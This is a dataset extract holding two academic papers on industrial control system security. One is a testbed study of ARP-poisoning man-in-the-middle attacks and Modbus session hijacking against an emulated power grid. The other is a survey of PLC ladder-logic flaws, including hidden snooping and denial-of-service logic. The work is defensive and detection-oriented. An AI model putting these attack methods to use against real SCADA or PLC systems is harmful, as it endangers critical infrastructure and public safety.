filename
stringlengths
34
130
summary
stringlengths
470
109k
body
stringlengths
254
172k
Attacking_SCADA_systems_A_practical_perspective.pdf
As Supervisory Control and Data Acquisition (SCADA) and Industrial and Automation Control System (IACS) architectures became more open and interconnected, some of their remotely controlled processes also became more exposed to cyber threats. Aspects such as the use of mature technologies and legacy equipment or even the unforeseen consequences of bridging IACS with external networks have contributed to this situation. This situation pr ompted the involvement of governmental, industrial and research organizations, as well as standardization entities, in order to create and promote a series of recommendations and standards for IACS cyber-security. Despite those efforts, which are mostly focused on prevention and mitigation, existing literature still lacks attack descriptions that can be reused to reproduce and further research specific use cases and scenarios of security incidents, useful for improving and developing new security detect ion strategies. In this paper, we describe the implementation of a set of attacks targeting a SCADA hybrid testbed that reproduces an electrical grid for energy distribution (medium and high voltage). This environment makes use of real SCADA equipment to faithfully reproduce a real operational deployment, providing a better insight into less evident SCADA- and device- specificities.
Attacking SCADA systems: a practical perspective Lu s Rosa1, Tiago Cruz1, Paulo Sim es1, Edmundo Monteiro1, Leonid Lev2 1CISUC-DEI, University of Coimbra, Portugal 2IEC Israel Electric Corportation, Israel {lmrosa, tjcruz, psimoes, edmundo}@dei.uc.pt, [email protected] Keywords Industrial Control Systems, SCADA, Security I. INTRODUCTION Supervisory Control and Data Acquisition (SCADA) systems are used to manage and automate processes in critical infrastructures such as electricity grids or water distribution facilities. According to the ISA definition [1], SCADA-based Industrial and Automation Control Systems (IACS) are structured into five distinct levels: level 0, reserved for the sensors and actuators; level 1, that contains devices such as Programmable Logic Controllers (PLC s) and Remote Terminal Units (RTU s); level 2, composed of supervisory control equipment's such as the Human-Machine Interface (HMI); level 3: for the Manufacturing Execution Systems (MES), such as the systems hosting production planning software; and level 4 for the remaining business related systems. The interconnection of level 0 and level 1 devices (e.g. PLC s and RTU s) and the interconnection of level 1 devices with level 2 devices (e.g. HMI s) are probably the most vulnerable points of IACS infrastructures. They were traditionally isolated and based on proprietary protocols and technologies without in trinsic security capabilities, relying on obscurity and air-gapping principles for such purpose. Nevertheless, with the progressive adoption of Ethernet- and TCP/IP-based networks, standardized SCADA protocols and VPN-based remote access (t o reduce maintenance costs), these networks are more connected than ever to the remaining infrastructure the corporate ne twork and even the Internet either by sharing physical network and computing resources or via (not foolproof) interconnection firewalls, routers or gateways. This paradigm change drastically increases the risks, due to the increased system complexity, the introduction of new attack vectors and the amplified exposure of existing security vulnerabilities. SCADA systems are intrinsically different from traditional ICT systems [2]. Automated real time physical processes do not need high throughput but demand continuous availability with guaranteed low delay and low jitter. More, their primary focus is on availability and service continuity opposed to classic ICT systems, where information confidentiality and integrity come first [3]. SCADA systems also have much longer lifetime cycles, due to their high upgrade costs easily reaching obsolescence by ICT standards. Even simple security patches take much longer to deploy, due to the need for previous testing and certification Recognizing those specificities and risks, as well as the tremendous impact they can ha ve on SCADA-based critical infrastructures such as energy gr ids, water distribution systems, transportation systems or factory plants, there is currently a strong investment on research towards enhancing the security of (both legacy and more recent) SCADA systems. There is an extensive literature researching various approaches for introducing IACS-specific intrusion detection mechanisms, as well as for improving the intrinsic security of SCADA systems. However, due to logistic constraints and the difficulty of using real-world production systems for research purposes, not many works are based on wider testbed scenarios reproducing real infrastructures, instead using very simplified test benches or general-purpose datasets. Among these, the large majority is focused on the defensive perspective of the targeted infrastructure, instead of th e attacker s point of view. While this is understandable considering how difficult it is to build larger, more realistic testbeds and the fact that researchers aim is to improve the SCADA systems cyber- security awareness and capabilities we believe it is also important to grasp the attacker s perspective, including the challenges he faces to implement a successful attack. In this paper, we provide a practical description of somehow representative cybe r-attacks (network based enumeration, communication hijacking and service disruption) targeting SCADA systems within a testbed that represents an 978-3-901882-89-0 @2017 IFIP 741 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:15 UTC from IEEE Xplore. Restrictions apply. electricity grid (regional network of medium and high voltage distribution). This testbed consists of a hybrid environment that includes real networking and SCADA assets (e.g. PLCs, HMIs, process control servers) controlling an emulated power grid (so we can assess the possible impact of these attacks on the physical world). We explain those attacks and discuss some of the challenges faced by an a ttacker to implement them. This work was performed in the scope of the CockpitCI [4] and ATENA [5] research projects, which aim at providing a holistic approach to security, safety and resilience of energy distribution grids, including the detection and prevention of cyber-attacks and the analysis of the mutual interdependency between their ICT assets (communications network, servers, SCADA control applications, PLC s and RTU s) and the energy side (e.g. transmission lines, substations, power transformers and generators, quality of energy service). Detection of cyber-attacks and situational awareness is a key part of these projects, and as such we built a specialized detection layer that has been extensively described and evaluated in previous works (e.g. [6-7]). This paper complements them by focusing not so much on the detection and mitigation solutions, but rather on the process of preparing and executing the attacks used for validation purposes. For sake of readability and represen tativeness, we decided to focus on simple, classic attacks, inst ead of more complex actions. The rest of the paper is organized as follows. Next section, we discuss related work. Section III introduces the testbed environment we used. The im plemented cyber-attacks are discussed in Section IV, and Section V concludes the paper. II. R ELATED WORK As already mentioned, existing research literature discusses different types of cyber-attack s against SCADA systems, such as Denial of Service (DoS) attacks [8-10], Man-in-the-Middle (MitM) attacks [11-12] or malware-based attacks [13]. Nevertheless, those discussions are usually focused on the defense mechanisms (and not on the attacks), based on small and/or simulated scenarios or lack detail on the practical implementation of the attack. Post-incident research on real -world attacks are valuable sources. Rolf Langer s report on the well-known Stuxnet malware [14] targeting Iran Nu clear facilities is a good example of such sources. Other high-profile well covered include the Duqu malware [15] or the 2015 Black Energy attack allegedly responsible for power outages in the Ukrainian Power Grid [16]. These sources have the advantage of being based on real, successful attacks but are usua lly limited to the analysis of complex high-profile incidents often supported by nation-state resources instead of simpler but representative attack profiles. III. T ARGET ENVIRONMENT A. HEDVa Testbed With the purpose of supporting the demonstration and validation of the CockpitCI framework, a testbed reproducing a regional-scale energy distribution network was built by Israel Electric Corporation (IEC). From ICT and SCADA perspectives this testbed is composed of real assets, including IT network, control and field level components, servers and services that typically integrate such a system. Within this scenario, an electrical distribution grid topology was entirely emulated using specialized soft ware developed at IEC, given the practical impossibility of us ing a real, large-scale energy distribution infrastructure (composed of many substations and hundreds of kilometers of power lines). This approach results in a hybrid testbed, where all ICT and SCADA components are real and believe to be monitoring and controlling a real energy grid. This is achieved by using an agent-based grid simulation model that uses real PLC equipment to emulate elements such as feeders or circuit breakers. The interface between th e real and emulated domains of the grid scenario includes all the monitoring data and controls that would exist in a real operational environment. Figure 1 provides an overview of this testbed (designated as HEDVa: Hybrid Environment for Design and Validation), of which only a subset will be relevant to the scope of this paper. By using such an environment, it became possible to research more complex interdependencies between different components (e.g. network, SCADA devices) and different domains (e.g. impact of ICT faults on the quality of energy on the different points of the grid). Furthermore, having a real deployment of ICT and SCADA systems allowed more realistic assessments and the collection of more extensive and realistic validation data. Figure 1: Overview of the HEDVa Testbed [6] B. The Modbus Protocol Among the wide range of different SCADA protocols available, the HEDVa Testbed uses Modbus over TCP/IP [17- 18]. Modbus is a protocol used to query field data using a polling client/server approach. Communication is based on query/response transactions identified by a transaction ID field and distinguished by a function code field. According to the Modbus data model, different types of tables are mapped into the PLC memory (such as discrete inputs, coils or holding registers). These values are queried via their respective function code and memory address (see Figure 2). There is no built-in mechanism (or fields) for authentication, authorization or encryption. Hence, without proper security enforcement in the remaining network stack, it 2017 IFIP/IEEE International Symposium on Integrated Network Management (IM2017): Experience Session - Full Paper 742 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:15 UTC from IEEE Xplore. Restrictions apply. becomes possible to dissect the Modbus messages payload (i.e. critical information from a physical process). Figure 2: Example of the interaction between two Modbus devices Forging communication or field data is also possible by simply crafting a valid value fo r the transaction ID field (see Figure 3), as this value is frequently predictable (due to lack of randomness in poor Modbus implementations) or even blindly discarded by some Modbus implementations. Moreover, Modbus/TCP runs on the top of non-encrypted TCP sessions. Figure 3: Modbus Frame and header format Even considering the real-time nature of the underlying processes, the polling based mechanism provided by the Modbus protocol is not effec tively real-time. The intervals between each request directly impact the delay time between a change in the physical process and the time the change is observed by the HMI operator. This results in a small but viable time window for hijacking communications before the Operator and/or the HMI appl ication notice any changes. Despite all these security vulnerabilities of Modbus apparently making the attacker s work too easy, Modbus holds a significant market share (over 20%, considering all its variations [19]) and many of the other protocols are not much different. This means the testbed represents of a large subset of the systems currently in operation. Several open source components can be used to build Modbus hacking tools, such as the Nmap s modbus-discover script [20] or Modscan [21] that allows to map and enumerate PLCs using Modbus over TCP within a network by exploring their replies. Another example is a python library extended from Scapy (a widely-used p acket manipulation framework easy to extend and integrate with other applications) that contains Modbus specific functions to easily craft Modbus frames [22]. Next section will discuss with the execution of a series of attacks, which also served fo r validating the proposed DIDS. IV. ATTACK STAGING AND EXECUTION All the attack scenarios assumed the attacker had access to the process control network (e.g. as result of a compromised host this step, which corresponds to the exploitation of the initial attack was intentionally omitted). For practical demonstrations, a dedicated host was deployed on the HEDVa, to serve as a base for the attacker, which could be easily relocated on the infrastructure, since it was hosted on a virtual machine. A similar attack strategy could be implemented (with the proper adjustments) to tr igger an attack (for instance, forging or sending Modbus packets) directly from a compromised HMI or other component. A three-stage attack strategy was devised, pursuing the following goals: monitoring the process values (to gain knowledge about the nature and characteristics of the controlled process), change them without being noticed in the SCADA HMI consoles and finally, induce service disruption on the energy grid. These should cover a large subset of a cyber-attack targeting a SCADA system. A by no means exhaustive list of the implemen ted attacks includes classical and Modbus specific scans, different variants of Denial of service attacks based on network floods, and a SCADA specific MitM specifically cu stomized for this process environment. Next, we describe some of those attacks. A. The HEDVa use case scenario for attack implementation For the sake of readability, we ll describe the attacks using a subset of the HEDVa testbed, configured to emulate an electricity distribution grid composed by two energy feeders and several circuit breakers, controlled by real Modbus PLCs (see Figure 4). Several HEDVa assets, including services, equipment (such as network switches and PLCs), servers (both physical and virtualized) and networks are also part of this use case. The PLCs and the remaining elements of the SCADA infrastructure in charge of th e emulated grid are connected using an Ethernet LAN infrastructure (using VLAN segmentation for domain separation). Figure 4: Representation of the electrical grid use case scenario The scenario deployed on the HEDVa (see Figure 5) includes two Human Machin e Interface (HMI) hosts, controlling and supervising the PLCs, an OPC server, a dedicated database for past even ts and offline analysis, and a deployment of the CockpitCI DIDS (not depicted). However, the DIDS security detection components didn t play any active role they were used to observe and document the attacks, without interfering with the attacker s actions. This scenario not only offered the means to validate the CockpitCI DIDS, but it also offered the opportunity to implement and analyze a series of security strategies. For the TCP Header MBAP Header Function Code IP Header DataTransactionID ProtocolID UnitID Length Modbus PL Cs T wo en er g y f eed er sCircuit break ersAll me asure Vo ltage and curre nt 2017 IFIP/IEEE International Symposium on Integrated Network Management (IM2017): Experience Session - Full Paper 743 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:15 UTC from IEEE Xplore. Restrictions apply. latter purpose, and complementar y to the classic penetration testing and auditing procedures, a series of team drills were executed to obtain relevant data on the most effective tactical defensive and offensive strategies. Switch HMI2 SCADA / OPC Server HMI1 Switch Security Gateway / Router Switch NIDS Attacker Switch Figure 5: Reference scenario for the use cases Besides these efforts, the acquisition of relevant datasets for development, training and offline evaluation of anomaly detection methods was also another important role of the HEDVa scenario. For capturing all the network interactions for further analysis, a centralized network point of capture was configured. This was achieved using port monitoring / mirroring in the switch layer, as opposed to a distributed packet acquisition solution to avoid all the issues with duplicated packets or timestamp synchronization. B. Network Reconnaissance Network scouting is one of the first steps of an attack, meant to gather information about all the components of the target environment, to discover and identify topologies, hosts and services. For instance, traditional network components such as HMIs are identified by IP and MAC addresses, operating system versions and a set of services (using techniques such as FIN scans, see Figure 6) in such cases, the specific service footprint, together with TCP fingerprinting data is useful to identify specific components or software implementations. Figure 6: First step of a Network/Modbus scan In addition to that, each PL C is also identified and addressed by the unitID field, part of the Modbus frame (see Figure 7). For simple scenar ios where one IP address correspond to one PLC, the unitID can be set to a fixed known value (typically 1 ) or may be ignored by the Modbus implementation. Nevertheless, a Modbus gateway, using only one IP address, may hide several PLCs with different unitIDs. As part of an attack, a Modbus request with a wrong unitID, blindly used by an attacker, may be discarded or easily flagged with proper security mechanisms. Thus, and for Modbus over TCP, it is critical to perform a Modbus enumeration on top of the traditional TCP/IP scans. Both types of scans are relevant as they can be used not only to discover devices and types of services but also to perform fingerprinting and discover PLCs behind gateways. Figure 7: Modbus Device Scan / Enumeration Network scouting provides a perspective on the target infrastructure from the network point-of-view, corresponding to the layers 2-4 of the OSI model. Despite its usefulness as a tool to identify and enumerate devices and services it doesn t provide process-level information, which is required to implement sophisticated attacks. The next subsection will present the technique that was us ed to obtain such information. C. Using ARP poisoning to implement a MitM attack The concept of a ARP poisoning MitM attack usually comprises two parts: an ARP spoofing and a communication hijacking step. In the first stag e, the idea is to spoof the ARP cache of both target devices, belonging to the same link, by sending malicious and unsolicited ARP is-at messages to the network (see Figure 8) to force both devices to send the packets through the attacker MAC address. This requires th e attacker to know at least the IP and MAC addresses of the victims and the link they are connected to. As soon as the ARP cache of each victim is spoofed, the traffic gets redirected through the attacker. Figure 8: ARP poisoning attack In the second attack stage (see Figure 9), when the traffic is already being redirected, the attacker can choose to read the messages and forward them, or actively change them. Depending on the type of TCP connection, its payload and the actual data the attacker is interested in, the process may get Control System Network22 HMI1 Attacker Attacker PLC SwitchFIN 11FINPort StatePort State Do it slo w lyAnd fo r all the ne two rkS tage 1: Ho sts and se rvice s Control System Network1 12 2 (spoofed) ARP Cache Table: ip_plc mac_atacker(spoofed) ARP Cache Table: ip_hmi mac_atacker HMI1 Attacker Attacker PLC SwitchARP Spoofed ReplyARP Spoofed ReplySt a g e 1 : ARP p o iso ning 2017 IFIP/IEEE International Symposium on Integrated Network Management (IM2017): Experience Session - Full Paper 744 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:15 UTC from IEEE Xplore. Restrictions apply. complex. For persistent TCP connections, as opposed to one TCP connection per data request (Modbus can be implemented using the two communication models), the attacker will need to keep the TCP fields consistent (e.g. sequence and acknowledgement numbers) and the connection open (e.g. TCP keep-alive packets). Figure 9: TCP hijacking Moreover, in the case of Modbus, the requested values typically change in real-time and some of them are directly changed by the SCADA operator (e.g. Modbus writes), this means the attacker n eeds to somehow keep track not only of all the interactions but also comput e and reproduce the effects in the physical process (e.g close of a circuit breaker in electric path may change the physical values such as current and voltage in other parts of the circuit). The complexity of this increases as the number of elements, relations and interdependencies increases. D. Attack strategy and execution The objective of the attacker can be su mmarized as such: hijack the entire grid in such a way that the main HMI (HMI1) has no clue about the ongoing attack. Moreover, the attack goal should be accomplished by the a ttacker while going unnoticed. One of the first challenges faced by the attacker has to do with understanding the network topology and communication flows. For instance, the HMI1 host (one of the victims) is not part of the same network link as the PLCs, requiring the attacker to implement an ARP spoof targeting the gateway interface of the network link where the attacker is placed instead of the HMI1 (see Figure 10). Figure 10: ARP poisoning for the implemented attack Besides HMI1, there is a second HMI (HMI2) developed to observe and validate the attack, which was not spoofed. HMI1 uses TCP persistent connections to control several PLCs (11, to be more precise). Thus, the a ttacker needs to know how to handle or forward any spoofed packets in real-time, while avoiding TCP connection drops, to prevent any suspicious behaviour on the HMI console that could unveil his presence (see Figure 11). Packet drops auto matically raise an alarm and change the view of the HMI for the corresponding PLC after a couple of seconds, indicating a potential issue. A TCP connection lost or a lack of a Modbus reply from the PLC is also visible from the HMI console. The second HMI did not use persistent connections. Later, during the trials, it was discovered that each PLC only supported a maximum of two simultaneous TCP connections. This may limit the way TCP connections are handled and re directed by the attacker. Figure 11: TCP hijacking for the implemented attack At first, the main concern was to place the attacker in the middle of the communication between the HMI1 and the PLCs to capture and analyze relevant process information. This allowed the attacker to gather more detailed information about the communications and the controlled process, learning how each Modbus register value affected the others (e.g. circuit breakers, current and voltage ranges). Once the attacker was able to figure out the basic behavior of the controlled process, it was time to step up the challenge and hijack the entire process. This required forging the entire grid state in such a way that any HMI interaction may produce a realistic state update, while decoupling HMI-PLC interactions. For this purpose, the attacker needs to reply to the Modbus requests in real-time. Moreover, TCP session hijacking requires the attacker to maintain the integrity of the TCP connection (such as TCP sequence numbers) to avoid a connection drop. Then, the following task is cr afting the Modbus frames and recreate a fake view of the entir e scenario in real-time. This task was implemented using a in-house application on the top of Scapy framework [22] since common open-source tools normally used for this sort of attacks are not SCADA/Modbus aware and did not fulfill the project needs, either by not offering an integrated solution for all the steps or by lacking flexibility to adjust settings to the HEDVa scenario. After the ARP spoofing, the attacker first starts by capturing the current state of th e grid. This is achieved by dumping and decoding one complete interaction cycle (i.e. the set of Modbus request-reply transactions) between the HMI1 and all PLCs. This represents the initial state of the simulated view and it allows to restore the previously grid state after stopping the attack (in case the attacker wants to do so). The attacker is also responsible to perform deep inspection of each packet and selectively intercept all the TCP connections from 2017 IFIP/IEEE International Symposium on Integrated Network Management (IM2017): Experience Session - Full Paper 745 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:15 UTC from IEEE Xplore. Restrictions apply. the HMI1 to the PLCs while forwarding the others (i.e. the communications between HMIs and PLCs). When requests from the HMI1 are received, the attacker will compute the responses based on its own replica of the model (obtained during the process analysis stage). This effectively decouples the HMI1 from the PLCs, creating two distinct communication flows: one between the HMI1 and the attacker and the other one betw een the attacker and each PLC. This allows not only to hijack the data exchanged between them but also trigger any kind of service disruption against the PLCs compromising the physical process behind them. Since the true state of the PLCs is hidden from HMI1, the attacker is free to do whatever he wants without the knowledge of the legit SCADA operator. Moreover, all the changes performed by the SCADA operator such as opening or closing a breaker are properly intercepted and handled by the attacker. Finally, whenever the attacker decides to stop the attack, he only needs to perform the inverse of the first steps, dumping the values of the simulated HMI1 view to the PLCs, so that there is no difference between the HMI1 and PLC states, also restoring the ARP caches by sending additional unsolicited ARP replies with the correct a ssociations between MAC and IP addresses. V. C ONCLUSIONS AND FUTURE WORK The attack procedures here described illustrate a complete intrusion procedure applied to a specific IACS use case. The reconnaissance step is like other types of network scans, the main difference is the Modbus unitID field, depending on the components and how they are deployed. The service disruption is also straight-forward since as soon as the attacker has access to the network, it is simple to redirect Modbus traffic (causing the disruption) or even flood the PLCs, as they typically have moderate / small amount of resources available. The communication hijacki ng attack that was implemented has proven to be considerably more complex and tightly coupled to the field processes in the SCADA environment than, for instance, a HTTP hijacking attempt. This is due to several reasons, such as the need to re produce part the physical process behavior without getting detected. Despite new infection paths, types of attacks or strategies to get unnoticed, further efforts and research should focus on improving the process of recreate and maintain the fake views used by the attacker during the communication hijacking and for specific known domains like energy grids. This work is part of a wide r effort where multiple cyber detection technologies are being researched to understand how these types of cyber security events could be adequately handled. Moreover, this effort also intends to alleviate the lack of open available datasets (such as raw traces from SCADA IACS) allowing to further expl ore and research new security approaches and detection mechanisms. A CKNOWLEDGMENT This work was partially funded by the CockpitCI European Project (FP7-SEC-2011-1 Project 285647) and by the ATENA European Project (H2020-DS-2015-1 Project 700581). R EFERENCES [1] ISA, ISA-62443-1-1 security for industrial automation and control systems part 1: Terminology, c oncepts, and models draft 5, International Society for Automation, 2015. [2] NIST, 800-82, Guide to Industrial Control Systems (ICS) Security, Rev. 2, National Institute of Standards and Technology, 2015. [3] ISA-99.00.01, Security for Industrial Automation and Control Systems - Part 1: Terminology, Concepts, and Models, American National Standard. 2007. [4] FP7 CockpitCI Research Proj ect, https://www.cockpitci.eu/ [5] H2020 ATENA Research Project, https://www.atena-h2020.eu/ [6] T. Cruz, L. Rosa, J. Proenca, L. Maglaras, M. Aubigny, L. Lev, J. Jiang, P. Simoes, A cyber security dete ction framework for supervisory control and data acquisition systems, IEEE Transactions on Industrial Informatics, Preprint. doi:10.1109/TII.2016.2599841 [7] T. Cruz, J. Proen a, P. Sim es , M. Aubigny, M. Ouedraogo, A. Graziano, L. Maglaras, A Distributed IDS for Industrial Control Systems, International Journal of Cyber Warfare and Terrorism, 4(2), 1- 22, April-June 2014. DOI: 10.4018/ijcwt.2014040101 [8] C. Queiroz, A. Mahmood, J. Hu, Z. Tari, and X. Yu, Building a scada security testbed, in Network and System Security, 2009. NSS 09. Third International Conference on, pp. 357 364, IEEE, 2009. [9] M. Mallouhi, Y. Al-Nashif, D. Cox, T. Chadaga, and S. Hariri, A testbed for analyzing security of SCADA control systems (tasscs), in Innovative Smart Grid Technologies, 2011 IEEE PES, pp. 1 7, 2011. [10] S. Bhatia, N. Kush, C. Djamaludin, J. Akande, and E. Foo, Practical modbus flooding attack and detecti on, in Proceedings of the 12th Australasian Information Security Conference-Volume 149, pp. 57 65, Australian Computer Society, Inc., 2014. [11] B. Chen, N. Pattanaik, A. Goulart, K. L. Butler- Purry, and D. Kundur, Implementing attacks for modbus/TCP protocol in a real-time cyber physical system test bed, in Co mm. Quality and Reliability, 2015 IEEE International Workshop Technical Committee on, pp. 1 6, 2015 [12] E. E. Miciolino, G. Bernieri, F. Pascucci, and R. Setola, Communications network analysis in a SCADA system testbed under cyber-attacks, in Telecommunications Forum (TELFOR) 2015 23rd, pp. 341 344, 2015. [13] D. Chen, Y. Peng, and H. Wang, Dev elopment of a testbed for process control system cybersecurity research, in 3rd International Conference on Electric and Electronics, Atlantis Press, 2013. [14] R. Langner, To kill a centrifuge a tec hnical analysis of what stuxnet s creators tried to achieve, The Langner Group, November 2003. [15] Laboratory of Cryptography and Syst em Security (CrySyS), Duqu: A Stuxnet-like malware found in th e wild, http://www.crysys.hu/ publications/files/bencsathPBF11duqu.pdf. [16] Blackenergy & quedagh: the convergence of crimeware and apt attacks. ,https://www.fsecure.c om/documents/996508/1030745/blacken ergy_whitepaper.pdf. [17] Modbus Organization, Modbus protocol specification, [18] Modbus Organization, Modbus messaging on TCP/IP implementation guide [19] IM S Research, The World Market for Industrial Ethernet 2013 Edition . [20] Nmap scripting engine-modbus-discove r nse script. , https://nmap.org/ nsedoc/scripts/modbus-discover.html. [21] Mark Bristow, Modscan, https://code.google.com/archive/p/modscan/ [22] A. Gervais, Modbus/TCP library for scapy 0.1. 2017 IFIP/IEEE International Symposium on Integrated Network Management (IM2017): Experience Session - Full Paper 746 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:15 UTC from IEEE Xplore. Restrictions apply.
PLC_Code-Level_Vulnerabilities.pdf
C ode vulnerabilities in the ladder logic of PLCs (Programmable Logic Controllers) have not been sufficiently addressed in the literature. Most of the research related to PLC threats or attacks focuses on the hardware portion of ICS (Industrial Control Systems) or SCADA (Supervisory Control and Data Acquisition) systems such as: industrial components, peripheral devices, or networks. It does not adequately discuss PLC code-level vulnerabilities and attacks. This paper provides an overview of some critical vulnerabilities within the PLC ladder logic code or program and recommends corresponding steps or methods to keep PLCs safer and more secure. The paper focuses on ladder logic code vulnerabilit ies and weak points that might be exploited by malicious attacks. Those weak points could be a result of intentional malicious pieces of code embedded within the ladder logic code or inadvertent ones such as bad code practices or human errors.
PLC Code-Level Vulnerabilities Abraham Serhane1, 2, Mohamad Raad1 1International University of Beirut 146404 Mazraa, Beirut, Lebanon Email: [email protected] Raad Raad2, Willy Susilo2 2University of Wollongong, Northfields Ave, Wollongong NSW 2522, Australia Index Terms DoS: Denial of Service, HMI: Human Machine Interface, ICS: Industrial Control Systems, JSR: Jump to Subroutine instruction PLC: Programmable Logic Controller, OTE: Output Energize instruction, SBR: Subroutine instruction, SCADA: Supervisory Control and Data Acquisition. I. INTRODUCTION PLCs are widely used in automated, industrial facilities and factories including national critical infrastructure: Power gri ds, water treatment, nuclear reactors, assembly lines, etc. PLCs a re dedicated and reliable real-time devices. Despite their reliability, accuracy, flexibility, and industrial robustness, PLCs are becoming a big concern after the Stuxnet malicious attack i n June 2010. Stuxnet malware highlighted the vulnerability of PLCs. The malware targeted PLCs and was able to stealthily and maliciously spy, attack, and compromise PLC related devices and codes [1], [2], [3] causing serious damages. Since Stuxnet s attack, PLCs have attracted the attention of the hackers with different malware attacks such as: BlackEnergy, Flame, and Wiper [4], [5], [6]. In 2011, the number of SCADA attacks increased by 300%. The average number of ICS flaws increased by 5% every year after [7], see Fig. 1. A study conducted by Kaspersky Lab shows that most of these PLC- related attacks are either critical ones, 49%, or of medium risk, 42%, see Fig. 2. The report clearly indicates that only 85% of these known published vulnerabilities are fixed but the rest are either partially fixed, can t be fixed, or not fixed at all [8]. According to Symantec, there were about 135 public vulnerabilities reported that are related to ICS/PLC-BS in 2015. While in 2014, only 35 ICS-related vulnerabilities were reported [9]. Much attention is usually directed towards external attacks li ke network intrusion, compromised SCADA devices and DoS (Denial of Service attacks), but little attention is given to t he ladder logic code vulnerability [10]. It has been assumed that ladder logic code is secure and safe as long as the network is healthy and protected from malware or intruders. But that is no t sufficient since the ladder logic itself has its own overlooked or unnoticed vulnerabilities which will be discussed in detail in this paper. Indeed, not many solutions exist to help secure PLCs such as certificateless cryptography [11] or intrusion detectio n through expected response times under normal operating conditions such as [12] and [13]. II. PLC OVERVIEW PLCs are a family of embedded devices. Besides its hardware architecture, PLC has it own OS system. Its software side is our concern because it is usually the one which is the most vulnerable to cyber-attacks. PLC software consists of the following: 1) PLC OS: PLCs provide the main control of ICS/SCADA systems. They are real-time systems. They are responsible of real-time interaction with all inputs (status or feedback of sensors, HMIs, other PLCs , and field devices, etc.) via industrial networks and transmit the proper outputs or commands after executing certain programs, ladder logic code, within the PLC in a very limited time. Unlike regular microcontrollers, PLCs consist of firmware (OS) which make them vulnerable to attacks and threats. PLCs generally contain a real-time operating system such as OS-9 or VxWorks [14]. If the OS is compromised by a hacker, the whole system can be completely taken over opening the door to varieties of malicious attacks and threats . 2) Ladder Logic Code: Ladder logic is the programming language that the code - logic - of the PLC programs is written in using special compilers or software. RSLogix5000, for instance, is a software used to write, edit, and compile ladder logic codes. The software uses IEC 61131-3 languages for the ,QWHUQDWLRQDO&RQIHUHQFHRQ&RPSXWHUDQG$SSOLFDWLRQV ,&& $  ,(((  Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:14 UTC from IEEE Xplore. Restrictions apply. logic, where IEC 61131-3 is an open international standard [15] for PLC programming Language. Every OEM vendor has its own PLC features and framework. While some are very advanced and allow several ways in writing logic, some others are very primitive and straightforward. However, Most of the PLCs ladder logic programs can be written as: Ladder Logic Diagrams (graphical); see Fig. 3(a). FBD: Functional Block Diagram (graphical); see Fig. 3(b). Structured Text (textual: XIO Examine if Open, XIC Examine if Closed, etc.) The most popular of the above code structure is ladder logic. I t is the program that controls, processes, and monitors all the parameters, inputs, outputs, and other decisions needed to run any automated or manually controlled devices or systems. Therefore, the code must be highly reliable with real-time data availability and high integrity to make prompt and precise logical calls and decisions. unlike some other high-level languages, ladder logic code is accessible and editable at any time even when the PLC is running without stopping or restarting the whole PLC ladder logic program. Therefore, any code vulnerabilities could lead to major catastrophic problems; even though the external environment is secure. III. LADDER LOGIC CODE VULNERABILITIES Not well structured and designed l adder logic code increases th e risks of vulnerabilities and security holes; even though the programmer is conforming to the company s standards and recommendations. And that could be more aggravated if the logic is not written by professional , experienced people; which is mostly the case. Standards are very subjective and are mainl y company oriented. Such standards are mainly created and instituted to keep systems functioning, well optimized, and saf e, but less attention is given to security threats and vulnerabili ties. Such cases create a back door to hackers or could inherit the PLC programs insecure and dormant or unnoticed threats. The following are some main examples of bad coding scenarios that any programmer should avoid. Ladder logic code vulnerabilities are summarized as follows: Using d uplicated instructions: reusing certain operands Such as: OTE, counters, timers, and JSR. more than once in the ladder code leads to undesired result. Fig. 4 shows an example of a duplicated OTE operand - Y1. The duplication in this logic makes Y1 triggered during its unintended time. The reason is that Y1 is going to be turned ON in the first rung and right away turns OFF if X2 is enabled. So, it goes ON or OFF based on the scanning result of the rung it belongs to. An unintended fluctuating value of an operand would make it hard to debug or notice. Keep in mind that duplicating certain outputs w ould n ot be allow ed in s om e PLCs, but s om e others would allow it. Snooping: a ladder logic code that can be written to log certain critical parameter and values to be leaked stealthily for spying purposes without affecting the logic flow and purpose. That can be done by utilizing array instructions like FIFO and some other arrays -based ones; e.g. ADD ON user defined instructions. Such instructions can be added unnoticed to the code and does not raise any suspicious or unusual behavior. Fig. 1. SCADA Vulnerability Disclosures by Year [4]. Fig. 2. SCADA s and other components vulnerabilities [5]. (a) (b) Fig. 3. Ladder Logic Diagram (a) compared to FBD (b). ,QWHUQDWLRQDO&RQIHUHQFHRQ&RPSXWHUDQG$SSOLFDWLRQV ,&& $  ,(((  Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:14 UTC from IEEE Xplore. Restrictions apply. Fig. 4. Duplicating OTE operand. Missing certain coils or outputs : occurs when a rung is missing a specific output coil (such as OTEs, latches or sets, unlatches, etc.) which other tag(s) depends on; see Fig. 5 . Missing coils increases the risk of vulnerability threats. It is a warning sign that someone could be deliberately tampering with logic to deviate certain critical values; risking the system to make wrong calls and decisions. Fig. 6 shows the proper way to handle OTE instructions where each rung has its proper pre-condition and output operands. Y11, an OTE instruction, depends on the value of the normally open instruction Y2. Not having Y2 instruction (deleted or replaced by non-useful false instruction) as a precondition to Y11, makes Y11 rung -condition- out False (Y11 always OFF). That would be hard to notice. Bypassing: either by manually forcing the values of certain operands while the ladder logic is online or by using empty branches, jumpers, as shown in Fig 7. DoS: the user can write online or upload a malicious piece of ladder logic to the PLC that might be activated or triggered at a certain time. That could slow down the PLC in a severe matter, totally halt it, or cause major faults . The operator can t access the ladder logic, edit it, or monitor values in real-time. The attack can be done through: - Coding a repetitive SBR calls via JSR instructions. - Coding infinite loop via jumpers. - Nest timers and jumpers. - Improperly inserting MCR - Master Control Reset - instructions that de-energized non- retentive instructions like OTE coils. - Coding certain ladder logic that might lead to fatal errors or major faults. Such faults might require restarting the PLC or re-uploading correct clean ladder logic which leads to data loss and temporarily shut down to the whole automated system associated with that PLC. The recovery could be time consuming and might cause damage to some meticulous industrial activities or devices; in addition to data loose of critical parameters or values. One of the solutions for such problems is to monitor jumpers and other looping routines using counters and timers. If the loops are going on more than expected warn the operator and halt 